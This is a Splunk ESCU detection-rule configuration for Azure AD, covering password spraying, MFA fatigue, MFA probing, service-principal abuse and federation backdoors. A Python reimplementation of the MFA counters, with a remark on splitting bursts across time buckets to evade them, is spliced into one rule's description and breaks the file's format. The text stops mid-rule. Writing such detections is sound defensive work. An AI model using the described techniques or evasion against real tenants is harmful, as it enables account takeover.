search = `azure_monitor_aad` category=SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | eval uniqueIPUserCombo = src_ip . "-" . user | stats count min(_time) as firstTime max(_time) as lastTime dc(uniqueIPUserCombo) as uniqueIpUserCombinations, dc(user) as uniqueUsers, dc(src_ip) as uniqueIPs, dc(user_agent) as uniqueUserAgents, dc(location.countryOrRegion) as uniqueCountries values(user) as users, values(src_ip) as ips, values(user_agent) as user_agents, values(location.countryOrRegion) as countries by _time | where uniqueIpUserCombinations > 20 AND uniqueUsers > 20 AND uniqueIPs > 20 AND uniqueUserAgents = 1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_multi_source_failed_authentications_spike_filter`

[ESCU - Azure AD Multiple AppIDs and UserAgents Authentication Spike - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic is crafted to identify unusual and potentially malicious authentication activity within an Azure AD environment. It triggers when a single user account, from a single source IP, is involved in more than 5 authentication attempts using 3 or more unique application IDs and more than 5 unique user agents within a five-minute window. This pattern is atypical for regular user behavior and may indicate an adversary's attempt to probe the environment, testing for multi-factor authentication requirements across different applications and platforms. The detection is based on Azure AD sign-in logs (the SignInLogs category), specifically focusing on sign-in events that either required MFA or succeeded with a single factor.
It employs statistical thresholds to highlight instances where the volume of authentication attempts and the diversity of application IDs and user agents associated with a single user account exceed normal parameters. Identifying this behavior is crucial as it provides an early indication of potential account compromise. Adversaries, once in possession of user credentials, often conduct reconnaissance to understand the security controls in place, including multi-factor authentication configurations. Tools like Invoke-MFASweep are commonly used for this purpose, automating the process of trying different user agents and application IDs to find client and application combinations where MFA is not enforced. By detecting these initial probing attempts, security teams can swiftly respond, potentially stopping an attack in its early stages and preventing further unauthorized access. This proactive stance is vital for maintaining the integrity of the organization's security posture. If validated as a true positive, this detection points to a compromised account, signaling that an attacker is actively attempting to navigate security controls to maintain access and potentially escalate privileges. This could lead to further exploitation, lateral movement within the network, and eventual data exfiltration. Recognizing and responding to this early stage of an attack is vital for preventing substantial harm and safeguarding sensitive organizational data and systems.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]}
action.escu.data_models = ["Authentication"]
action.escu.eli5 = This analytic is crafted to identify unusual and potentially malicious authentication activity within an Azure AD environment. It triggers when a single user account, from a single source IP, is involved in more than 5 authentication attempts using 3 or more unique application IDs and more than 5 unique user agents within a five-minute window.
This pattern is atypical for regular user behavior and may indicate an adversary's attempt to probe the environment, testing for multi-factor authentication requirements across different applications and platforms. The detection is based on Azure AD sign-in logs (the SignInLogs category), specifically focusing on sign-in events that either required MFA or succeeded with a single factor. It employs statistical thresholds to highlight instances where the volume of authentication attempts and the diversity of application IDs and user agents associated with a single user account exceed normal parameters. Identifying this behavior is crucial as it provides an early indication of potential account compromise. Adversaries, once in possession of user credentials, often conduct reconnaissance to understand the security controls in place, including multi-factor authentication configurations. Tools like Invoke-MFASweep are commonly used for this purpose, automating the process of trying different user agents and application IDs to find client and application combinations where MFA is not enforced. By detecting these initial probing attempts, security teams can swiftly respond, potentially stopping an attack in its early stages and preventing further unauthorized access. This proactive stance is vital for maintaining the integrity of the organization's security posture. If validated as a true positive, this detection points to a compromised account, signaling that an attacker is actively attempting to navigate security controls to maintain access and potentially escalate privileges. This could lead to further exploitation, lateral movement within the network, and eventual data exfiltration. Recognizing and responding to this early stage of an attack is vital for preventing substantial harm and safeguarding sensitive organizational data and systems.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details).
You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category.
action.escu.known_false_positives = Rapid authentication from the same user using more than 5 different user agents and 3 application IDs is highly unlikely under normal circumstances. However, there are potential scenarios that could lead to false positives.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Multiple AppIDs and UserAgents Authentication Spike - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Account Takeover"]
action.risk = 1
action.risk.param._risk_message = $user$ authenticated in a short period of time with more than 5 different user agents across 3 or more unique application IDs.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 48}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Multiple AppIDs and UserAgents Authentication Spike - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` category=SignInLogs operationName="Sign-in activity" ((properties.authenticationRequirement="multiFactorAuthentication" AND properties.status.additionalDetails="MFA required in Azure AD") OR (properties.authenticationRequirement=singleFactorAuthentication AND "properties.authenticationDetails{}.succeeded"=true)) | bucket span=5m _time | rename properties.* as * | stats count min(_time) as firstTime max(_time) as lastTime dc(appId) as unique_app_ids dc(userAgent) as unique_user_agents values(appDisplayName) values(deviceDetail.operatingSystem) by _time, user, src_ip | where count > 5 and unique_app_ids > 2 and unique_user_agents > 5 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_multiple_appids_and_useragents_authentication_spike_filter`

[ESCU - Azure AD Multiple Denied MFA Requests For User - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic targets the detection of an unusually high number of denied Multi-Factor Authentication (MFA) requests for a single user within a 10-minute window, specifically identifying instances where more than nine MFA prompts were declined by the user. Utilizing Azure Active Directory (Azure AD) sign-in logs, particularly focusing on "Sign-in activity" events, it filters for scenarios where the MFA request was denied due to the user declining the authentication, as indicated by error code 500121 and additional details stating "MFA denied; user declined the authentication." The data is then aggregated into 10-minute intervals, counting events and capturing the earliest and latest times of occurrence for each user. This behavior is significant for a Security Operations Center (SOC) as it could be an early indicator of a targeted attack or an account compromise attempt, with an attacker having obtained the user's credentials and the user actively declining the MFA prompts, preventing unauthorized access. A true positive detection would imply that an attacker is on the verge of gaining full access to the user's account, posing a threat that could lead to data exfiltration, lateral movement, or further malicious activities within the organization, necessitating immediate investigation and response to safeguard the organization's assets.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1621"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This analytic targets the detection of an unusually high number of denied Multi-Factor Authentication (MFA) requests for a single user within a 10-minute window, specifically identifying instances where more than nine MFA prompts were declined by the user. Utilizing Azure Active Directory (Azure AD) sign-in logs, particularly focusing on "Sign-in activity" events, it filters for scenarios where the MFA request was denied due to the user declining the authentication, as indicated by error code 500121 and additional details stating "MFA denied; user declined the authentication."
The data is then aggregated into 10-minute intervals, counting events and capturing the earliest and latest times of occurrence for each user. This behavior is significant for a Security Operations Center (SOC) as it could be an early indicator of a targeted attack or an account compromise attempt, with an attacker having obtained the user's credentials and the user actively declining the MFA prompts, preventing unauthorized access. A true positive detection would imply that an attacker is on the verge of gaining full access to the user's account, posing a threat that could lead to data exfiltration, lateral movement, or further malicious activities within the organization, necessitating immediate investigation and response to safeguard the organization's assets.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category.
action.escu.known_false_positives = Multiple denied MFA requests in a short period of time may also be a sign of authentication errors. Investigate and filter as needed.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Multiple Denied MFA Requests For User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Account Takeover"]
action.risk = 1
action.risk.param._risk_message = User $user$ denied more than 9 MFA requests in a timespan of 10 minutes.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Multiple Denied MFA Requests For User - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1621"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic targets the detection of an unusually high number of denied Multi-Factor Authentication (MFA) requests for a single user within a 10-minute window, specifically identifying instances where more than nine MFA prompts were declined by the user. Utilizing Azure Active Directory (Azure AD) sign-in logs, particularly focusing on "Sign-in activity" events, it filters for scenarios where the MFA request was denied due to the user declining the authentication, as indicated by error code 500121 and additional details stating "MFA denied; user declined the authentication." The data is then aggregated into 10-minute intervals, counting events and capturing the earliest and latest times of occurrence for each user. This behavior is significant for a Security Operations Center (SOC) as it could be an early indicator of a targeted attack or an account compromise attempt, with an attacker having obtained the user's credentials and the user actively declining the MFA prompts, preventing unauthorized access.
A true positive detection would imply that an attacker is on the verge of gaining full access to the user's account, posing a threat that could lead to data exfiltration, lateral movement, or further malicious activities within the organization, necessitating immediate investigation and response to safeguard the organization's assets.
action.notable.param.rule_title = Azure AD Multiple Denied MFA Requests For User
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` category=SignInLogs operationName="Sign-in activity" | rename properties.* as * | search status.errorCode=500121 status.additionalDetails="MFA denied; user declined the authentication" | bucket span=10m _time | stats count min(_time) as firstTime max(_time) as lastTime by _time, user, status.additionalDetails, appDisplayName, user_agent | where count > 9 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_multiple_denied_mfa_requests_for_user_filter`

[ESCU - Azure AD Multiple Failed MFA Requests For User - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies multiple failed multi-factor authentication requests for a single user within an Azure AD tenant. Error Code 500121 represents a failed attempt to authenticate using a second factor. Specifically, the analytic triggers when more than nine MFA user prompts fail within 10 minutes. These failures can have several causes, such as the user not responding in time or receiving multiple duplicate MFA requests. Azure AD tenants differ widely between organizations; security teams should test this detection and customize these arbitrary thresholds.
The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard the user with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request. Threat actors such as LAPSUS$ and APT29 have used this technique to bypass multi-factor authentication controls, as reported by Mandiant and others.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1621", "T1078", "T1078.004"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies multiple failed multi-factor authentication requests for a single user within an Azure AD tenant. Error Code 500121 represents a failed attempt to authenticate using a second factor. Specifically, the analytic triggers when more than nine MFA user prompts fail within 10 minutes. These failures can have several causes, such as the user not responding in time or receiving multiple duplicate MFA requests. Azure AD tenants differ widely between organizations; security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard the user with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request. Threat actors such as LAPSUS$ and APT29 have used this technique to bypass multi-factor authentication controls, as reported by Mandiant and others.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details).
You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category.
action.escu.known_false_positives = Multiple failed MFA requests may also be a sign of authentication or application issues. Filter as needed.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Multiple Failed MFA Requests For User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Account Takeover"]
action.risk = 1
action.risk.param._risk_message = User $user$ failed to complete MFA authentication more than 9 times in a timespan of 10 minutes.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Multiple Failed MFA Requests For User - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1621", "T1078", "T1078.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies multiple failed multi-factor authentication requests for a single user within an Azure AD tenant.
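The two MFA-fatigue rules above, Multiple Denied MFA Requests For User and Multiple Failed MFA Requests For User, key on the same error code 500121 and differ only in whether `status.additionalDetails` equals the user-declined string; each then counts per user, details, application and user agent in 10-minute buckets and fires on a count above nine. The Python below is an added example written for this page, not Splunk code; it implements both counters in one function over constructed sign-in events. The flat field names mirror the searches' renamed `properties.*` fields, and the timeout detail string, the application name and the user agent are illustrative values chosen for the example, not taken from the page.

```python
"""Added example: MFA-fatigue counters mirroring the two 500121 searches above.
Not Splunk code; the events below are constructed, not from a real tenant."""
from collections import Counter
from datetime import datetime, timezone

MFA_FAILED = 500121  # status.errorCode: second-factor authentication failed
USER_DECLINED = "MFA denied; user declined the authentication"
SPAN = 10 * 60       # bucket span=10m
THRESHOLD = 9        # where count > 9


def mfa_fatigue(events, threshold=THRESHOLD, span=SPAN):
    """Count 500121 sign-in events per (kind, user, details, app, user_agent, bucket).

    kind is "denied" when the user explicitly declined the prompt (the Denied
    search) and "failed" for every other 500121 detail such as a timeout (the
    Failed search, which excludes the declined string). Returns only the groups
    whose count exceeds the threshold, i.e. the rows the searches would emit.
    """
    counts = Counter()
    for e in events:
        if e["operationName"] != "Sign-in activity" or e["errorCode"] != MFA_FAILED:
            continue
        kind = "denied" if e["additionalDetails"] == USER_DECLINED else "failed"
        key = (kind, e["user"], e["additionalDetails"], e["appDisplayName"],
               e["user_agent"], int(e["_time"]) // span * span)
        counts[key] += 1
    return {k: c for k, c in counts.items() if c > threshold}


def sample_events():
    """Constructed SignInLogs-style events; the timeout string, app name and
    user agent are illustrative values, not copied from any tenant."""
    base = datetime(2024, 1, 15, 9, 0, tzinfo=timezone.utc).timestamp()
    timeout = "MFA denied; user did not respond to mobile app notification"

    def ev(offset, user, details, app="Office 365 Exchange Online", ua="Mozilla/5.0"):
        return dict(_time=base + offset, operationName="Sign-in activity",
                    errorCode=MFA_FAILED, additionalDetails=details, user=user,
                    appDisplayName=app, user_agent=ua)

    events = []
    # bob declines 12 pushes in four minutes: the Denied search fires (count 12).
    events += [ev(i * 20, "bob@example.com", USER_DECLINED) for i in range(12)]
    # carol lets 11 prompts time out in five minutes: the Failed search fires (count 11).
    events += [ev(i * 30, "carol@example.com", timeout) for i in range(11)]
    # dave declines three prompts: below threshold, no finding.
    events += [ev(i * 60, "dave@example.com", USER_DECLINED) for i in range(3)]
    # eve declines 12 prompts straddling the 09:10 bucket edge (6 + 6): no finding,
    # the blind spot of fixed buckets compared with a sliding window.
    events += [ev(480 + i * 20, "eve@example.com", USER_DECLINED) for i in range(12)]
    return events


if __name__ == "__main__":
    for (kind, user, details, app, ua, start), count in mfa_fatigue(sample_events()).items():
        when = datetime.fromtimestamp(start, tz=timezone.utc).strftime("%H:%M")
        print(f"{kind:6} {user:18} {count:2} x {details!r} via {app} at {when}")
```

The eve case is the one to remember when tuning: an attacker who starts pushing prompts a few minutes before a bucket boundary splits the burst across two windows and stays under the threshold in both. Widening `span` catches it at the cost of more noise, and a sliding-window count per user (or `streamstats` with a time window in SPL) avoids the edge entirely.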
Error Code 500121 represents a failed attempt to authenticate using a second factor. Specifically, the analytic triggers when more than nine MFA user prompts fail within 10 minutes. These failures can have several causes, such as the user not responding in time or receiving multiple duplicate MFA requests. Azure AD tenants differ widely between organizations; security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard the user with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request. Threat actors such as LAPSUS$ and APT29 have used this technique to bypass multi-factor authentication controls, as reported by Mandiant and others.
action.notable.param.rule_title = Azure AD Multiple Failed MFA Requests For User
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` category=SignInLogs operationName="Sign-in activity" properties.status.errorCode=500121 properties.status.additionalDetails!="MFA denied; user declined the authentication" | rename properties.* as * | bucket span=10m _time | stats count min(_time) as firstTime max(_time) as lastTime by _time, user, status.additionalDetails, appDisplayName, user_agent | where count > 9 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_multiple_failed_mfa_requests_for_user_filter`

[ESCU - Azure AD Multiple Service Principals Created by SP - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection identifies when a single service principal in Azure AD creates more than three unique OAuth applications within a 10-minute span, potentially signaling malicious activity. It monitors the 'Add service principal' operation, focusing on the activity of service principals rather than individual users. By aggregating the creation events over a 10-minute period, the analytic tracks how many distinct OAuth applications are created by each service principal. This is key for SOC teams to pinpoint potential attack staging, where an attacker might use a compromised or malicious service principal to rapidly establish multiple service principals, facilitating network infiltration or expansion. While the default threshold is set to trigger on more than three applications, security teams should adjust this to fit their specific environment's norms.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This detection identifies when a single service principal in Azure AD creates more than three unique OAuth applications within a 10-minute span, potentially signaling malicious activity. It monitors the 'Add service principal' operation, focusing on the activity of service principals rather than individual users. By aggregating the creation events over a 10-minute period, the analytic tracks how many distinct OAuth applications are created by each service principal. This is key for SOC teams to pinpoint potential attack staging, where an attacker might use a compromised or malicious service principal to rapidly establish multiple service principals, facilitating network infiltration or expansion.
While the default threshold is set to trigger on more than three applications, security teams should adjust this to fit their specific environment's norms.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLogs log category.
action.escu.known_false_positives = Certain users or applications may create multiple service principals in a short period of time for legitimate purposes. Filter as needed.
action.escu.creation_date = 2024-02-07
action.escu.modification_date = 2024-02-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Multiple Service Principals Created by SP - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Persistence", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = Multiple OAuth applications were created by $src_user$ in a short period of time
action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "other", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Multiple Service Principals Created by SP - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` operationName="Add service principal" properties.initiatedBy.app.appId=* | rename properties.* as * | bucket span=10m _time | rename targetResources{}.displayName as displayName | rename targetResources{}.type as type | rename initiatedBy.app.displayName as src_user | stats min(_time) as firstTime max(_time) as lastTime values(displayName) as displayName dc(displayName) as unique_apps by _time, src_user | where unique_apps > 3 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_multiple_service_principals_created_by_sp_filter`

[ESCU - Azure AD Multiple Service Principals Created by User - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection focuses on identifying instances where a single user creates more than three unique OAuth applications within a 10-minute timeframe in Azure AD, a potential indicator of malicious activity. By monitoring the 'Add service principal' operation and aggregating the data with a 10-minute bucket span, it tracks the number of distinct OAuth applications created by each user. This analytic is crucial for SOC teams to detect possible staging of attacks, where an adversary might rapidly create multiple service principals as part of their infiltration or expansion strategy within the network.
The threshold of three applications is set to flag unusual behavior, but security teams are advised to adjust this value to suit the normal operational patterns of their environment action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection focuses on identifying instances where a single user creates more than three unique OAuth applications within a 10-minute timeframe in Azure AD, a potential indicator of malicious activity. By monitoring the 'Add service principal' operation and aggregating the data with a 10-minute bucket span, it tracks the number of distinct OAuth applications created by each user. This analytic is crucial for SOC teams to detect possible staging of attacks, where an adversary might rapidly create multiple service principals as part of their infiltration or expansion strategy within the network. The threshold of three applications is set to flag unusual behavior, but security teams are advised to adjust this value to suit the normal operational patterns of their environment action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase(https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLogs log category. action.escu.known_false_positives = Certain users or applications may create multiple service principals in a short period of time for legitimate purposes. Filter as needed. 
action.escu.creation_date = 2024-02-07 action.escu.modification_date = 2024-02-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Multiple Service Principals Created by User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = Multiple OAuth applications were created by $src_user$ in a short period of time action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "other", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Multiple Service Principals Created by User - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Add service principal" properties.initiatedBy.user.id=* | rename properties.* as * | bucket span=10m _time | rename targetResources{}.displayName as displayName | stats min(_time) as firstTime max(_time) as lastTime values(displayName) as displayName dc(displayName) as unique_apps by src_user | where unique_apps > 3 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_multiple_service_principals_created_by_user_filter` [ESCU - Azure AD Multiple 
Users Failing To Authenticate From Ip - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies one source Ip failing to authenticate with 30 unique valid users within 5 minutes. This behavior could represent an adversary performing a Password Spraying attack against an Azure Active Directory tenant to obtain initial access or elevate privileges. Error Code 50126 represents an invalid password. This logic can be used for real time security monitoring as well as threat hunting exercises.\ Azure AD tenants can be very different depending on the organization. Users should test this detection and customize the arbitrary threshold if needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies one source Ip failing to authenticate with 30 unique valid users within 5 minutes. This behavior could represent an adversary performing a Password Spraying attack against an Azure Active Directory tenant to obtain initial access or elevate privileges. Error Code 50126 represents an invalid password. This logic can be used for real time security monitoring as well as threat hunting exercises.\ Azure AD tenants can be very different depending on the organization. Users should test this detection and customize the arbitrary threshold if needed. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the Signin log category. 
action.escu.known_false_positives = A source Ip failing to authenticate with multiple users is not common for legitimate behavior. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Multiple Users Failing To Authenticate From Ip - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = Source Ip $src_ip$ failed to authenticate with 30 users within 5 minutes. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Multiple Users Failing To Authenticate From Ip - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats count min(_time) as firstTime max(_time) as lastTime dc(user) AS unique_accounts values(user) as user
by src_ip | where unique_accounts > 30 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_multiple_users_failing_to_authenticate_from_ip_filter` [ESCU - Azure AD New Custom Domain Added - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the addition of a new custom domain within an Azure Active Directory tenant. Adding a custom domain is a step required to set up the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the addition of a new custom domain within an Azure Active Directory tenant. Adding a custom domain is a step required to set up the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. 
